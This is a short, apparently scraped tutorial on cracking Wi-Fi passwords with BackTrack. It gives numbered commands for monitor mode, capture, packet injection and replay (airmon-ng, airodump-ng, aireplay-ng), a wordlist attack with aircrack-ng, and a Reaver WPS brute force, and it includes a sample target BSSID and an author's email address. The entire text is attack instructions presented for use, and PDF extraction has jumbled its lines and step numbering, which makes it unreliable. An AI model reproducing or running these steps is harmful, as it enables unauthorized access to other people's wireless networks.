Você está na página 1de 2

steps to crack wifi using backtrack: 1.

ifconfig // to check the wireless card // to create the moniter mode here mon0 // to see the list of stations and their cHANNEL stren

2. airmon-ng start wlan0 3. airodump-ng mon0 gth 4. airodump-ng e name to save or airodump-ng [file name to

-c [channel number] --bssid [bssid number of the channel] -w [fil transaction] mon0 mon0 --bssid [bssid number of the channel] -c [channel number] -w save transaction]

// we should restrict monitoring to a single channel to speed up data collection , otherwise the wireless card has to alternate between all channels .You c an restrict the capture by giving in the following commands New terminal 5. aireplay-ng -1 0 -a [bssid number] mon0 or ing (check atleast 25000 packets) aireplay-ng -1 3 -a [bssid number] mon0 new terminal 6. aireplay-ng 3 -b (bssid of target) -h ( address of your card (mon0)) (interfa ce) In my case i enter-- aireplay-ng 3 -b 98:fc:11:c9:14:22 -h 00:c0:ca:50:f8:3 2 mon0 7. aircrack-ng [file name-01.cap] -w wordlist.lst //Aireplay to Speed up the crack

cracking using reaver --------------------Step 4: type airmon-ng start wlan0 Step 5: type airodump-ng mon0 (you can see different types of network there like: WPA or WPA 2, this works for WEP and WPA/2 type. When youre done, press CTRL+C to stop.) Step 4: type in the same application reaver -I mon0 -b (bssid) -vv You don't need to wait for the data to go upto 25000. This will automatically cr ack the password when it gets to 100%. After that, BINGO, you have successfully crack the WPA/2 password

Nishant kumar sinha

love143nishant@gmail.com

Você também pode gostar